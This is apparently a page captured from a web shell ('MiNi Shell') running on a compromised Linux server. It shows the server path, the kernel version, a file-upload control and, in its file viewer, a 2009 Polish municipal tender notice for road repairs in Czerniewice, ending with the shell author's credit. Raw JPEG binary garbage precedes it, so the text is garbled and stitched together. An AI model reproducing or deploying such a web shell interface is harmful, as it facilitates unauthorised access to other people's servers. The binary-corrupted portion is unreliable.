JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/125678-N-2009.html

<p class="kh_header"><b>Czerniewice: Remont dróg</b><br>
<b>Numer ogłoszenia: 125678 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerniewice , ul. Mazowiecka 42, 97-216 Czerniewice, woj. łódzkie, tel. 044 7104044, faks 044 7104010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  dróg:
1) remont drogi w m. Dąbrówka  w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 4 730 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 15 cm - 4 730 m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x 4 400 m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 1 650 m2,
   -  zagęszczanie poboczy gruntowych - 1 650 m2

2) remont drogi w m. Mała Wola w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 1 320 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 15 cm - 1 320 m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x  1200 m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 600 m2,
  -  zagęszczanie poboczy gruntowych - 600 m2

3) remont drogi w m. Nowa Strzemeszna w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 2 795 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 15 cm - 2 795 m2,
   - nawierzchnia z betonu asfaltowego o/12.8 wg. PN-S-96025 o grubości 5 cm ( warstwa ścieralna) - 2600m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 975 m2,
  -  zagęszczanie poboczy gruntowych - 975 m2

4) remont drogi w m. Krzemienica  w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 3 870 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 8 cm - 3 870 m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x 3 600 m2   - profilowanie i uzupełnianie poboczy gruntowych - 1 350 m2,
  -  zagęszczanie poboczy gruntowych - 1 350 m2


5) remont drogi w m. Zubki Małe w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 684 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 8 cm - 684 m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x 630 m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 270 m2,
  -  zagęszczanie poboczy gruntowych - 270 m2

6) remont drogi w m. Czerniewice ul. Łąkowa w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 430 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 20 cm - 430- m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x 400 m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 150  m2,
  -  zagęszczanie poboczy gruntowych - 150  m2
  - wykonanie przepustu drogowego z rur o śr. 50 cm - 15 mb.

7) remont drogi w m. Paulinów w zakresie:
   - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni o pow. 2 470 m2,
   - wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie wg PN-S-06102:1997 gr. 15 cm - 2 470 m2,
   - trzykrotne powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową i grysem kamiennym  o pow. 3 x 2 275 m2.
   - profilowanie i uzupełnianie poboczy gruntowych - 975  m2,
  -  zagęszczanie poboczy gruntowych - 975 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki wynikające z art. 22 ust.1 pkt. 1-4  ustawy Prawo zamówień publicznych tj;
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.
a) prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 02 lipca 2004r o swobodzie działalności gospodarczej ( tekst jednolity Dz.U. z 2007r Nr 155, poz.1095 z późn.zm) w zakresie odpowiadającym przedmiotowi zamówienia,

2) posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów3 do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj: 
a) wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia minimum dwa zamówienia odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia ( min. dwa zamówienia dot. nawierzchni asfaltowej oraz min. Dwa zamówienia dot. powierzchniowego utrwalenia nawierzchni..).
Za robotę budowlaną odpowiadającą rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, zamawiający uzna robotę budowlaną polegającą na wykonaniu nawierzchni drogi z betony asfaltowego na powierzchni minimum  2600 m2 oraz robotę polegającą na trzykrotnym powierzchniowym utrwaleniu nawierzchni drogowej emulsją asfaltową i grysem kamiennym na powierzchni minimum 12 700 m2 .
                  b) posiadają minimum jedna osobę z uprawnieniami do kierowania robotami w zakresie budowy dróg wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa,
                3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie amówienia tj. posiadają środki finansowe lub zdolność kredytową w wys. 800 000 zł.
                 4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  

Zamawiający dokona oceny spełniania przez Wykonawców   warunków  udziału w postępowaniu na podstawie złożonych w ofercie oświadczeń  i dokumentów. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę, na zasadzie: spełnia - nie spełnia.
Wykonawca, który nie spełnił choć jednego z w/w warunków, zostanie wykluczony z postępowania.
Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy nie złożyli pełnomocnictw, albo którzy złożyli oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Do udokumentowania spełnienia wymogów warunków oraz uznania formalnej poprawności oferta musi zawierać następujące dokumenty:
         1) Oświadczenie, że oferent spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 oraz nie podlega wykluczeniu na podstawie        art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych,   wzór zał.2)
       2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
       3)  aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania  ofert.
       4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
       5) aktualna informacja z Krajowego rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem składania ofert.

       W przypadku składania oferty przez podmioty występujące wspólnie w/w dokumenty musza być złożone przez każdy podmiot.
      2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składają:
         1) pp. 2,3 i 5 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
          a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert,
         b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji organu - wystawiony nie wcześniej niż 3 miesiące przed upływem składania ofert,
       c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony  nie wcześniej niż 6 miesięcy przed upływem składania ofert,
      2) ppkt.4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.

          Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania.

3. W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:
    1)  wykaz wykonanych w okresie ostatnich trzech lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,                  z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. (wzór zał. Nr 3)
    2) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg. Wzoru stanowiącego załącznik nr 4 oraz pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa wyżej, wykonawca wskazał osoby, którymi będzie dysponował.
   Do wykazu należy dołączyć dokumenty potwierdzające wymagane uprawnienia tj. uprawnienia do kierowania robotami w zakresie budowy dróg wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa.
   W przypadku składania oferty przez podmioty występujące wspólnie w/w dokumenty mogą być złożone łącznie przez wszystkie podmioty.

4 . W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wykonawca składa:
    1)  Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż trzy miesiące przed upływem terminu składania ofert. 
W przypadku składania oferty przez podmioty występujące wspólnie w/w dokument musi złożyć co najmniej jenem podmiot.

      5. W skład oferty musi wchodzić również:
          1. formularz ofertowy wg wzoru - załącznik nr 1,
          2. szczegółowy kosztorys ofertowy ( wg. zał. nr 6)
          3. zaakceptowany projekt umowy - wg. wzoru - załącznik nr.5

     6.  Dokumenty wymienione w pkt. 1,2,3 i4 są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
     Dokumenty wymienione w pkt.5 należy złożyć w oryginale.
     Kopie dokumentów musza być poświadczone - za zgodność z oryginałem-  na każdej zapisanej stronie dokumentu przez osobę upoważniona do podpisania oferty.
     Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

    7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

    8. Brak jakiegokolwiek dokumentu lub złożenie dokumentu zawierającego błędy lub nie poświadczenie za zgodność z oryginałem, spowoduje wykluczenie wykonawcy z postępowania o udzielenie zamówienia, z zastrzeżeniem art. 26 ust.3 ustawy pzp.

      9. Zamawiający informuje, że zgodnie z art. 96 ust.3 ustawy pzp. oferty składane w postępowaniu o zamówienie publiczne sa jawne i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeśli wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą być one udostępniane.
          Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust.4 ustawy z dnia 16 kwietnia 1993r o zwalczaniu nieuczciwej konkurencji (Dz.U.Nr 47, poz. 211 z późn.zm) rozumie się nieujawnione do wiadomości publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności, tzn. zastrzegł składając ofertę, iż nie mogą być one udostępnione innym uczestnikom postępowania.
         Stosowne zastrzeżenie wykonawca winien złożyć na formularzu ofertowym.
           W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdej zainteresowanej osoby.
          Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa były przez wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem -tajemnica przedsiębiorstwa- lub spięte (zszyte) oddzielnie od pozostałych jawnych elementów oferty.
    10. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia (np. konsorcjum)
Oferta wspólna musi spełniać dodatkowo niżej wymienione wymagania:
1) Partnerzy muszą ustanowić i wskazać Pełnomocnika ( zwanego w niniejszej SIWZ Pełnomocnikiem) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Partnerów.
   Do oferty należy dołączyć stosowne pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
2) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów,
3) Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem
4) W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zamawiający żądał będzie przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. Termin, na jaki została zawarta umowa wykonawców, nie może być krótszy od terminu określonego na wykonane zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.czerniewice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Czerniewicach
97-216 czerniewice ul. Mazowiecka 42
( za odpłatnościa - 50 zł netto).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:30, miejsce: Urząd Gminy w Czerniewicach
97-216 Czerniewice ul. Mazowiecka 42 ( sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com